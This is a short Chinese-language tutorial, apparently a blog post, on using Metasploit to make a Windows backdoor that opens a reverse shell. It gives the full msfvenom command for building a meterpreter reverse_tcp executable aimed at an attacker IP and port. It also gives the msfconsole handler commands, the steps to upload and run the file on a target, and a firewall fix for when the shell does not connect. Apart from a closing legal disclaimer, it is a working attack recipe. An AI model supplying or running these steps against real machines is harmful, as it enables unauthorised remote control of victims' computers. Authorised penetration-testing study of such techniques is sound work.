使用MSF生成后门程序,反弹shell
设置攻击机IP和端口,生成后门程序
sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=172.24.4.7 lport=4444 -f exe -o attack.exe
设置监听模块
- 打开 msfconsole
- 使用以下命令设置监听模块
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.24.4.7
set lport 4444
run
将生成的后门程序上传到目标机上
运行后门程序
错误出现
运行后门程序后攻击机没有监听到。
经过排查后,现在是攻击机防火墙导致没有监听到
解决方法
- 关闭防火墙
- 添加入站规则
这里笔者直接选择简单粗暴的关闭防火墙(狗头保命)
成功监听到(不需要关闭目标的防火墙就可以成功)
请确保在使用这些技术时,您有权这么做,并且您的行为符合法律法规和道德准则。这些信息仅供教育和研究目的使用。